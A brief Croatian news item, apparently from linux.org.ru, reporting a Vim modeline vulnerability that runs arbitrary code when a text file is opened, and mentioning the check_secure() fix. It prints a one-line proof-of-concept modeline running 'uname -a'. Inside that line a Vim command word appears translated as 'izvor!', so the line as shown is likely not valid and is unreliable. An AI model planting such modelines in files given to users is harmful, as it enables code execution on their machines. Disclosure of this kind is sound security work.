Ranjivost u vim

U uređivaču teksta vim objavljena je ranjivost koja dopušta izvršavanje proizvoljnog koda kada uređivač otvori tekstualnu datoteku.

Ovdje je tekst datoteke koja izvršava bezopasni uname -a

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("izvor! %"):fdl=0:fdt="

Popravak u obliku dodanog check_secure() poziva već je dostupan u repozitoriju vim i neovim.

Izvor: linux.org.ru

Dodajte komentar